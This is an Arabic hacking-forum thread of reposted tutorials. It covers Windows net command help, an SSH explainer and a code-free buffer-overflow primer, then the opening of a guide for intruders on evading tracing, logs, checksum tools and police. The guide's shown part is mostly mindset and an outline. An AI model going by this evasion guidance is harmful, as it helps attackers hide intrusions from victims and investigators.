تعين اسم المستخدم، أو اسم الكمبيوتر، أو اسم المراسلة التي تريد إرسال الرسالة إليها. إذا كانت المعلومات التي توفرها تحتوي على فراغات، استخدم علامات الاقتباس حول النص (على سبيل المثال، "Computer Name"). ربما تؤدي أسماء المستخدمين الطويلة إلى حدوث مشاكل عند استخدامها كأسماء NetBIOS. يتم تحديد أسماء NetBIOS بـ 16 حرفاً، ويتم حجز الحرف السادس عشر.
*
ترسل الرسالة إلى كافة الأسماء الموجودة في المجال أو في مجموعة العمل الخاصة بك.
‎/domain:name‎
ترسل الرسالة إلى كافة الأسماء الموجودة في مجال الكمبيوتر. يمكنك تعيين name لإرسال الرسالة إلى كافة الأسماء الموجودة في المجال أو في مجموعة العمل المعينة.
‎/users
ترسل الرسالة إلى كافة المستخدمين المتصلين بالملقم.
message
مطلوبة. تعين نص الرسالة.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
• يمكنك إرسال رسالة إلى اسم نشط موجود على الشبكة فقط. في حال إرسال الرسالة إلى اسم مستخدم، يجب أن يكون قد تم تسجيل دخول هذا المستخدم وتشغيل خدمة المرسل لتلقي الرسالة.
• يمكنك بث رسالة إلى كافة الأسماء الموجودة في مجال الكمبيوتر الخاص بك (استخدم * أو ‎/domain‎)، أو في مجال مختلف (‎/domain:‎DomainName). يمكن أن تحتوي رسائل البث على 128 حرفاً كحد أقصى. انتبه عند إرسال الرسائل إلى عدة مستخدمين.
• تسمح لك ‎/users‎ بإرسال رسالة إلى كافة المستخدمين الذين لديهم جلسات عمل مع الملقم. انتبه عند إرسال الرسائل إلى عدة مستخدمين.
• يجب تشغيل خدمة المرسل ليتم استلام الرسائل. لمزيد من المعلومات حول كيفية تشغيل خدمة، راجع مواضيع ذات صلة.
أمثلة
لإرسال الرسالة "Meeting changed to 3 P.M. Same place." إلى المستخدم robertf، اكتب:
‎net send robertf Meeting changed to 3 P.M. Same place.‎
لإرسال رسالة إلى كافة المستخدمين المتصلين بالملقم، اكتب:
net send /users This server will shut down in 5 minutes.‎
لإرسال رسالة تتضمن علامة الخط المائل (/)، اكتب:
net send robertf "Format your disk with FORMAT /4"

Net session
يدير اتصالات أجهزة كمبيوتر الملقمات. عند الاستخدام دون معلمات، يعرض net session معلومات حول كافة جلسات العمل مع الكمبيوتر المحلي.
بناء الجملة
‎net session [\\ComputerName] [/delete]‎
المعلمات
‎\\ComputerName
تعرف الكمبيوتر الذي من أجله تريد سرد جلسات العمل أو قطع اتصالها.
‎/delete‎
تنهي جلسة عمل الكمبيوتر مع ComputerName وتغلق كافة الملفات المفتوحة على الكمبيوتر من أجل جلسة العمل هذه. إذا تم حذف ComputerName، يتم إلغاء كافة جلسات العمل على الكمبيوتر المحلي.
net help command
تعرض التعليمات لأمر net المحدد.
تحذير
إن استخدام net session يمكن أن يؤدي إلى فقدان البيانات. ربما ترغب بتحذير المستخدمين قبل قطع اتصال جلسة العمل.
ملاحظات
يمكنك أيضاً استخدام net sessions أو net sess لتشغيل net session.
استخدم net session لعرض أسماء أجهزة الكمبيوتر وأسماء المستخدمين للمستخدمين الموجودين على الملقم، ولمعرفة ما إذا كان لدى المستخدمين ملفات مفتوحة، ولمعرفة مدة تعطيل جلسات العمل لكل مستخدم.
تظهر المعلومات بتنسيق مشابه لمايلي:
Computer User name Client type Opens Idle time

------------------------------------------------------------------------
‎\\‎BASSETT CHRISDR Windows 2000 1 00:00:13
‎\\‎SHARONCA Administrator DOS LM 2.1 0 01:05:13
لعرض جلسة عمل مستخدم واحد، استخدم ComputerName مع الأمر. تتضمن المعلومات المتعلقة بمستخدم وحيد قائمة بالموارد المشتركة التي يتصل بها المستخدم.
يتم تسجيل جلسة العمل عندما يتصل المستخدم الموجود على العميل بشكل ناحج بالملقم. تحدث جلسة العمل الناجحة عندما يكون جهازي الكمبيوتر موجودين على نفس الشبكة، وعندما يكون لدى المستخدم اسم وكلمة مرور مقبولين من قبل الملقم. يجب أن يكون لدى المستخدم الموجود على العميل جلسة عمل مع الملقم قبل إمكانية استخدام موارد الملقم، ولا يتم تأسيس جلسة العمل إلى أن يتصل المستخدم الموجود على العميل بمورد ما. يكون بين العميل والملقم جلسة عمل واحدة فقط، ولكن يمكن أن يكون لديهما العديد من نقاط الإدخال، أو الاتصالات، بالموارد.
لتعيين الوقت الذي يمكن أن تبقى خلاله جلسة العمل معطلة قبل أن يتم قطع اتصالها تلقائياً، عيّن الميزة autodisconnect باستخدام net config server /autodisconnect. لمزيد من المعلومات حول net config server، راجع مواضيع ذات صلة. يكون قطع الاتصال التلقائي شفافاً بالنسبة للمستخدم لأنه تتم إعادة اتصال جلسة العمل تلقائياً عندما يصل المستخدم إلى المورد مرة ثانية.
لإنهاء جلسة العمل مع الملقم، استخدم net session ‎\\‎ComputerName /delete.
أمثلة
لعرض سرد عن معلومات جلسة العمل للملقم المحلي، اكتب:
net session
لعرض معلومات جلسة العمل للعميل ذو اسم الكمبيوتر Shepherd، اكتب:
net session \\shepherd
لإنهاء كافة جلسات العمل بين الملقم والعملاء المتصلين به، اكتب:
net session /delete

Net statistics
يعرض سجل الإحصائيات لخدمة الملقم أو محطة العمل المحلية، أو للخدمات قيد التشغيل والتي تتوفر الإحصائيات لها. عند الاستخدام دون معلمات، يسرد net statistics الخدمات قيد التشغيل التي تتوفر الإحصائيات لها.
بناء الجملة
‎net statistics [{workstation | server}]‎
المعلمات
workstation
تعرض إحصائيات خدمة محطة العمل المحلية.
server
تعرض إحصائيات خدمة الملقم المحلي.
net help command
تعرض التعليمات لأمر net المحدد

Net view
يعرض قائمة المجالات، أو أجهزة الكمبيوتر، أو الموارد التي تتم مشاركتها من قبل الكمبيوتر المعين. عند الاستخدام دون معلمات، يعرض net view قائمة بأجهزة الكمبيوتر الموجودة في المجال الحالي.
بناء الجملة
‎net view [\\ComputerName] [/domain[:DomainName]]‎
‎net view /network:nw [\\ComputerName]‎
المعلمات
‎\\ComputerName
تعين الكمبيوتر الذي يحتوي على الموارد المشتركة التي تريد عرضها.
‎/domain[:DomainName]‎
تعين المجال الذي تريد عرض أجهزة الكمبيوتر المتوفرة فيه. إذا تم حذف DomainName، يعرض ‎/domain‎ كافة المجالات الموجودة في الشبكة.
‎/network:nw‎
تعرض كافة الملقمات المتوفرة على شبكة NetWare. في حال تعيين اسم كمبيوتر، يعرض ‎/network:nw‎ الموارد المتوفرة على ذلك الكمبيوتر في شبكة NetWare. يمكنك أيضاً تعيين شبكات الاتصال الأخرى التي تمت إضافتها إلى النظام.
net help command
تعرض التعليمات لأمر net المحدد.
ملاحظات
استخدم الأمر net view لعرض قائمة بأجهزة الكمبيوتر. يكون الإخراج مشابهاً لمايلي:
‎Server Name Remark‎
-------------------------------------------------
‎\\Production Production file server‎
‎\\Print1 Printer room, first floor‎
‎\\Print2 Printer room, second floor‎
أمثلة
لمشاهدة قائمة بالموارد المشتركة من قبل الكمبيوتر ‎\\Production‎، اكتب:
net view \\production
لمشاهدة الموارد المتوفرة على ملقم NetWare المسمى ‎\\Marketing، اكتب:
net view /network:nw \\marketing
لمشاهدة قائمة بأجهزة الكمبيوتر الموجودة في مجال أو مجموعة عمل sales، اكتب:
net view /domain:sales
لمشاهدة كافة الملقمات في شبكة NetWare، اكتب:
net view /network:nw
________________________________________

انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:14   #9
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
"شرح الـsecure shell"
<منقول من منتديات ابن مصر>
<الكاتب: ACID BURN_EG>
السلام عليكم و رحمه الله و بركاته :
اليوم سوف نتطلع الى اداه فى النت ورك و هى اداه هامه جداا تستخدمها معظم السرفرات على الانترنت و هذه الاداه هى الSecure Shell اى ال SSh ::

و لنبدأ الان الحديث عنها ::

ما هى ال SSh ؟
===============
الsecure shell هى اداه (برنامج) للاتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذ اوامر او مهام معينه داخل هذا الجهاز اى و هو الاتصال عن بعد remotely connection و تستخدم ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات الاتصال الغير امنه و هى تعتبر كبديل جيد جداا لادوات تستعمل لنفس الغرض فى يونكس مثل (rlogin,rsh and rcp).
و تقدم ايضا ال secure shell اتصال امن جداا لشحنات اتصالات ال tcp كونيكشن .



و هنا يأتى سؤال مهم :: و السؤال هو ::

لماذا يفضل استخدام ال secure shell على الادوات الاخرى التى يطلق عليها r- commands فى يونكس ==================================================
======================================
كالمذكورين فى الاعلى ؟
======================
فى توزيعات اليونكس مثل ال *BSD تتعرض الادوات التى يطلق عليها r- commands مثل (rlogin,rsh and rcp) الى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت اكسيس (root access) للاجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اى ريموتلى يمكنه ان يدخل الى كل بيانات الاجهزه التى على الشبكه بدون ادنى صعوبه لانه يستطيع بالروت اكسس ان يعبر من خلال اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و هذا ما يسمى بأن الشخص لديه unauthorized access to systems اعتقد انكم فهمتونى الان و يمكن ايضا لاى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خلال شبكتك و تكون هذه الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك

ملحوظه: طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى الاختراق و تستخدم فى اختراق المنظمات الكبرى و تقع تحت بند تقفى الاثر و الاعداد للاختراق )

و الان نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب الادوات فى يونكس فالسيكيور شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى لا يعطيه الحق للدخول الى بيانات اجهزه الشبكه الا بالباسورد و لا يمكن التحايل على الssh فى هذه النقطه و بذلك حتى لو تمكن الشخص من اكتساب الروت اكسس لن يستطسع الاطلاع على بيانات الشبكه
الا ب authorized access to systems .

و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله لان السيكيور شيل لا يرسل الباسوردات فى صوره واضحه كما ترسلها ادوات يونكس الاخرى و لكن يرسلها مشفره و لذلك سيكون على المخترق محاوله فك الشفره و الخ

و لكن مع كل هذه المزايا لم يخلى ال secure shell من الثغرات و لكن تعتبر ثغراته قليلا و تقريبا معظمها يحتاج الى الرووت اكسس و الاخرى يمكن ان تخترق السيكيور شل فقط بها (هذا كلام بينى و بينكم)

و الان سؤال اخر ::

ما هى انواع الهجوم التى تحمى منها ال ssh ؟
===========================================
1- تحمى من ال ip spoofing اى تحمى من انتحال عنواين الاى بى حيث انه لو ارسل شخص ما باكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال ssh و تحمى ايضا ال ssh من المنتحلين على الشبكه المحليه اى localy .

2- تحمى مما يسمى ال DNS spoofing

3- تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس

4- تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت لاى داتا مخزنه

و لكن مع كل هذا فأن ال ssh ليس امن بدرجه كبيره حيث ان الاشخاص ذو خبره كبيره فى النت ورك يستطيعون ان يجعلون ال ssh ينقطع عن الاتصال اى disconnected و لكن لا يمكن ان يكسرو تشفير بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها .

و ايضا كل الاشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها ال ssh و هى تسمح بأكثر من نوع تشفير مثل (three-key triple-DES, DES, RC4-128, TSS, Blowfish) يمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى الاداه تسمح لك بعدم تشغيل التشفير اى" encryption of type "none و بهذا تجعلنى اقول عليك احمق ! لان هذا يجعل ال ssh سهله الاختراق مثل الادوات التى تم ذكرها فى اول الموضوع فى يونكس , حيث ان هذا التشفير ايضا يمنع ال ip spoofing و ال DNS spoofing و هذا ايضا بالاضافه الى تغيير مفاتيح فك التشفير كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما .

اذن فهى اداه حقا مميزه و تستحق الاحترام و الاهتمام مع انها لا تخلو من الثغرات و لكن لنجعلها افضل ما موجود فى هذا المجال

ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسن ظنكم.
انتهى،،،




" شرح معنى الـ Buffer Overflows"
<منقول من منتديات شبكة الحزم الإسلامية>
<الكاتب: LAMeR>
اقدم لكم درس يشرح ما معنى الـ Buffer Overflows .. وانشالله تستفيدون منه

يله نبدأ

محتويات الدرس:

1- ما هو الـ Buffer Overflow ؟
>--------------------------

2- المعالجه(Proccess)
>-----------------

3- إدارة الذاكره (Memory management)
>--------------------------------

4-استغلال ماذكر في الـ Buffer Overflow
>----------------------------------

* ماذا يجب أن أعرف قبل أن أقرأ هذه المقالة؟
ليس الكثير،،، فهذا دليل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسية بمفهوم برامج الحاسوب وإدارة الذاكرة

1-ما هو الـ Buffer Overflow؟
>-----------------------<

Buffer Overflow حالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء.
احدث ثغرة يمكنك أستغلالها من نوع Buffer Overflow تسمى فايروس 'code red' ، التي أستغلت في خادم IIS لمايكروسوفت -MS web server -
عموما، يحدث Buffer Overflow عندما يظهر برنامج ما متغيّر بحجم ثابت (على سبيل المثال،حجم 20 بايت) و القيمة التي خصّصت إلى هذه المتغيّر أكبر من حجم المتغيّر.

خذ هذا المثال:
يظهر برنامجي على الشاشة هذه الجملة: "رجاء إطبع اسمك الأول: "ثم سيأخذ برنامجي من المستخدم البيانات التي سيدخلها وهي (اسمه الأول) ثم توضع في متغير فتظهر في برنامجي او تخزن.
المشكلة هنا تكمن في انه إذا كان المتغيّر مخصص لتخزين بيانات حجمها الأقصى يساوي 15 بايت والبيانات هنا(وهي اسم المستخدم)حجمها 25 بايت التي ستخزن في المتغير (يتضح لنا ان اسم المستخدم وضع في مكان اقل من حجمه ).
اذن ماذا سيحدث للبيانات الزائدة عن 15 بايت من المؤكد انها سـ"تطفح Overflow" على الذاكرة التي خصّصت لمتغيّر الاسم.

عندما يبدأ البرنامج، تخصّص الذاكرة :
<var1><var2><vname><Other things in memory>
10b 6b 15b
(var 1 وvar 2 متغيّرات ليست لها علاقة بالأسم المدخل ,vname المتغيّر الذي حجمه 15 بايت
وهو الذي سيحتوي الاسم الذي سيدخله المستخدم)

نفترض ان المستخدم سيدخل الاسم " abcabcabcabcabcabcabcabca
bc" حينها ستبدو الذاكره هكذا:

somevalue2avalusabcabcabc
abcabcabcabcabcabc
<var1 ><var2><vname ><other things go here>

اذا ماذا حدث ؟؟ المتغيّر vname "طفح overflowed" بسبب البيانات المدخلة عليه من قبل المستخدم و قيمة "other things in memory أشياء اخرى في الذاكره" تغيّرت بسبب فيض(overflow) الحروف من ادخال المستخدم.

اذن كيف أستغلّ هذا الخطأ؟؟؟
قبل أن نصل إلى الجواب، هناك بعض الأشياء الأساسية المهمة التي يجب علينا أن نعرفها حول تركيب وبنية الحاسوب .
في هذه المقالة سنناقش نظام لينكس linux، لكن المفهوم مماثل لباقي الأنظمة.


2-المعالجه(Proccess):
>----------------<

إنّ الوحدة الوظيفية الأساسية في حاسوب يعمل هي عملية المعالجه (Proccess).في الحاسوب هنالك العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القوّة التي تجعل العديد من العمليات تعمل في نفس الوقت في الحاسوب.
ليس هناك شيء إسمه "متعددالعمليات Multi- proccesses" صحيح... كيف اذن؟؛ انَّ وحدة المعالجة المركزية(CPU) تنتقل بين العمليات كلُُ على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي تعمل في وقت واحد،
اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا ..
كلّ عملية لها عنوان فاضي من الذاكره ، ولايمكن لأي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة. وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو:



3-إدارة الذاكره (Memory management):
>------------------------------<

تدير أنظمة التشغيل-operating systems-الحديثة ذاكرة افتراضية virtual memory(تخيلية).
ذلك يعني بأنّه لايمكن لأي تطبيق (برنامج مثلا) الوصول مباشرة إلى الذاكرة الحقيقية.لماذا؟؟
انظمة التشغيل Operating System تمتلك جدول تخطيط "تحويل العناوين الحقيقية من الذاكرة الى عناوين افتراضية(تخيلية)" .
وعندما تقوم ذاكرة الـ OS (نظام التشغيل)بتحديد مكان في الذاكرة لبرنامج معين لتشغيله ،يأخذ البرنامج العنوان التخيليّ فقط ، وليس العنوان الطبيعي.
و هنالك استخدام اخر للذاكرة الإفتراضية(التخيليّة) وهي انه من المعلوم أن الذاكرة الحقيقية لا ترتبط مباشرة بكل عملية (أو برنامج)، فنظام التشغيل يستخدم مساحة على القرص الصلب كذاكرة،
والتطبيق لا يمكنه أبدا معرفة مكان الذاكرة ( مكان الذاكرة الحقيقة )،ذلك لأن المساحة المخصصة للذاكرة في القرص الصلب تتبدل وتتغير.

توضيح :. ان الذاكرة لا تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد
اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ، حيث ان الذاكرة الحقيقة تمثل مساحة معينة من القرص الصلب (ومكان هذه المساحة في تغير مستمر) لذلك سميت حقيقية او بمعنى اخر طبيعية (اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب)
وفائدة الذاكرة الإفتراضية هي إعطاء عنوان افتراضي (غير حقيقي ) للذاكرة الحقيقية اي يعطي عنوان كأسم فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ، وإن تغير مكان المساحة المخصصة للذاكرة يظل العنوان الإفتراضي(التخيلي) ثابت.


4-استغلال ماذكر في الـ Buffer Overflow
>---------------------------------<
الآن نصل إلى الجزء الأهم والمرح
كيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر (Root) وأختراق النظام؟ تذكّر نحن قلنا في وقت سابق بأنّه عندما يكون الإدخال(البيانات) من المستخدم أكبر حجما من الذاكرة التي خصّصت لهذه البيانات، البيانات الزائدة ستفيض (overflow) في الذاكرة التي بعد الاسم المتغيّر؟ هذا المكان من الذاكرة هو المكان الذي نستفيد منه في الأختراق.
ماذا نعمل في ذلك المكان: داخل خط (مكان) البيانات التي يدخلها المستخدم (في المثال السابق وهو الاسم الأول الذي يطلب من قبل البرنامج ثم أدخلناه ) نضع الأوامر الأكثر شعبية للحاسوب، حيث هذه الأوامر تجعل الحاسوب يحدث(ينتج) هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغلّ. القيام بهذا العمل ليس بيسطا كما يبدو لك، إذن لو أردت معرفة كيف يعمل ، أنت يجب أن تقرأ المقالة القادمة حول Buffer Overflows، الذي سيصف بالضبط كيف لإستغلال واحده من الـBuffer Overflows في الإختراق.

اخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى Buffer Overflow واللي فهم الدرس نص نص يعيد قرائته اكثر من مرة مع التدقيق وانشالله يفهم.
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:15   #10
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
" الـCGI وعلاقتها بالإنترنت "
<منقول>
<مترجم من قبل:King_abdo>
في هذا الملف سوف نقوم بعرض مقدمة الـ CGI و علاقتها بالانترنت

(1) مقدمة للـ CGI

CGI=COMMON GATEWAY INTERFACE هي الواجهة التي تسمح بالاتصال بين جانب المستخدم عن طريق المتصفح أو البرامج
و خلافه و جانب الويب سيرفر الذي يفهم بروتوكول (HTTP)

الـ TCP/IP هو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء الاتصال . البورت المحددة
لهذا البروتوكول هي 80 ( من الممكن أن تتغير هذه البورت)

تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخلات معينه يقوم

مبرمج السي جي أي بتحديدها

يقوم عمل سكريبتات السي جي أي علي خطوتين أساسيتين :

1- في الخطوة الأولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له
2- في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس

يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل

يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك
أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج
المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير
للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره

أهم الأوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي :

1- GET هذا الأمر يقوم بطلب بيانات من السيرفر للمتصفح
2- POST هذا الأمر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح
3- PUT هذا الأمر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخلات الموجودة حاليا


(2) نقاط الضعف


نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه
ضعف في بروتوكول الـHTTP أو في أنظمة التشغيل المختلفة
السي جي أي يسمح باستغلال نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام
الأمني . كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ FTP أو TELNET.
انتهى،،،





" كيف تحمي نفسك وتخفي أفعالك؟!"
<منقول من منتدى إعصار>
<الكاتب: المدمر>
مقدمه بسيطه :
==========
في البدايه و قبل كل شئ ارجو منكم تحمل اخطائي سواء كانت نحويه او املائيه .. كل ما اسعى له هو تعميم الفائده على الجميع
و ان نتقدم نحن العرب و نترقي باعل المستويات و المكانات الي نستحقها ..
الموضوع ليس صغير و ليس بسهل في القراءه .. ارجو ان تكون صبورا متانيا حتى اخر الموضوع
هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك .. لكن انشاله سيكون دفعه للامام و ليس لان تخاف و تتراجع
اسلوب الموضوع غريب .. و عادة ما نتجنبه دائما .. بمعنى اخر .. كل من اخواننا و اساتذتنا من كتبوا دروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق log files .. لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد الانتهاء من قراءة الموضوع ..
************************
اذا كنت تظن ان الحصول على ترجمة الثغرات ( exploites ) باسرع ما يمكن هو ما يجعلك محترفا و متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط "
ماذا ستفيدك الثغره الحديثه جدا ( 0day ) عندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره .. ؟ و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟!
يمكن يرى البعض ان هذا لم بحدث قط لاي شخص نعرفه ؟ او ان بلادنا ليس فيها هذه التقنيات العاليه !! لكن هذا قد يحدث يوم ما !!
و ايضا انت لاتهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه .. كما انه لابد من الحرص و فهم الامور اذا كنت تريد ان تسمي نفسك هكر hacker بمعنى الكلمه
ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير لانك من المعروفين عنهم بالاحتراف او انك ترى ذلك في نفسك .. لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه
************************
الموضوع مقسم الى 8 اجزاء :
=================
الجزء الاول : المقدمه ( و هو ماقد قمت انت بالانتهاء من قرائته حاليا )
الجزء الثاني : الامور العقليه و كيف تصبح **" Paranoid " هذا الجزء سيتم عرضه من خلال هذه المواضيع :
- الدافع او الحافز
- لماذا ان لابد ان تصبح " Paraniod "
- كيف يمكن ان تصبح " Paranoid " ؟
- و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!

** متاكد ان معظمكم يتسائل عن معنى هذه الكلمه .. سيتم توضيح معناها و مفهومها مع شرح هذا الجزء انشاله .
الجزء الثالث : الاساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ( و سيتم عرضها من خلال النقاط التاليه )
- تمهيد
- امن نفسك
- حسابك الخاص
- ملفات اللوق LoGs
- لا تترك اي اثر
- امور و اشياء يجب تجنبها و الحظر منها
الجزء الرابع : التقنيات الحديثه الي يتي يجب ملاحظتها ( و سيتم عرضه من خلال النقاط التاليه )
- تمهيد
- امنع تقفى اثرك من اي نوع
- ايجاد اي نوع من انواع ملفات اللوق lOGs مهما كان فيها من تلاعب ..
- تحقق من syslog configuration and logfile
- تحقق من نوعيات برامج الامن المثبته
- تحقق من وجود المدراء Admins
- كيف يمكن تصحيح checksum checking software
- حيل المستخدم الامنيه

الجزء الخامس : ماذا تفعل ان وضعت تحت المراقبه
الجزء السادس : ما الذي عليك القيام به و ايضا الذي لابد من عدم القيام به في حالة انه تم القبض عليك
الجزء السابع : قائمه بافضل البرامج للتخفي و الاختباء
الجزء الثامن : كلمه ختاميه ........ ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من الان ... !!!

************************
الجز الثاني :
=======
- الدافع و الحافز :
*************
لابد من تحكيم العقل للنجاح في اي عمل .. العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي .. مسئول و حريص
المخترق ( Hacker ) الناجح لابد و ان تتوفر فيه هذه المبادىء و الامكانيات العقليه .. مثلها مثل بناء عضلات الجسم لن يكبر الجسم و يتقسم الا بعد ممارسة الرياضه الخاصه بذلك ( على سبيل المثال )
مهما كنت متمرس او لديك الكثيير من المعلومات لابد اخذ اشد الاحتياطات و الحذر قبل القيام باي شئ

- لماذا يجب ان تصبح " Paranoid " ؟
***************************
كلمة " Paranoia " في اللغه الانجليزيه تعني جنون الارتياب ( نزعه عند الافراد تجعلك تشك في جميع الامور و جميع الاشخاص )
اعتقدان الامور بدات تتضح لنا بعد معرفة اصل هذه الكلمه ..
يمكن ان نلخض ما ذكر من خلال الكلمات التاليه : paraniod تعني ان تصبح شديد الحذر و الشك في جميع الظروف
لماذا يجب توخي الحذر بهذه الطريقه المخيفه ؟!!
لان توقعك دائما الى اسوء الظروف يجعلك تسير في امان .. و لان ما تفعله هو شئ كبيير جدا .. ما تراه انت بعينك المجرده انك تغير الصفحه الرئيسيه .. او تقوم بتحميل بعض المعلومات من السيرفر هو شئ بسيط بل و سهل جدا
ماذا لو انك اخترقت سيرفر معين و تم رصدك و تتبعك و القبض عليك من قبل الشرطه !؟! و انك سترمى في السجن كالسارقين و المجرمين
ان كنت لا تهتم بما قد يحصل لك .. عليك الاهتمام بما ما قد يصيب اهلك .. ابوك ... امك .. اخوتك .. زوجتك و اطفالك ( ان كنت متزوج )
ربما لاتشعر بان ماتقوم به هو جريمه .. لكن في الحقيقه هي جريمه !!
هل تعرف ماذا سينتظرك ان تم القبض عليك ؟!
سيتم حرمانك من كل امور الكومبيوتر .. نظرة الناس الغيير طبيعيه لك ( ليست نظرة اعجاب انما نظرة خوف ) .. لن تحظى بفرص العمل التي تستحقها .. ستسدعى عند حصول اي مشاكل اخرى من هذا النوع .. لذا فان معظم من يسقطون لا يقومون ثاني ابدا !!

لذا فاصبح حذرا جدا و شكاكا .. امن نفسك
اخذ جميع الاحتياطات
لاتهتم بما قديقوله الكثيرون عنك بانك خواف او ما شابه
اهتم باي ملف log مهما كانت قيمته تافهه
لتصبح hacker عليك ان تقوم بعملك .. سليما 100 %

- كيف تصبح " Paranoid " ؟
*********************
اذا كنت قرأت ما سبق و اقتنعت به انت بالفعل اصبحت هذا الشخص " Paranoid " لكن الاقتناع وحده لا يكفي و التحمس وحده وليد اللحظه ايضا لايكفي ... انما لابد ان يكون القلق و التوتر موجودين بشكل دائم في حياتك ( الالكترونيه )
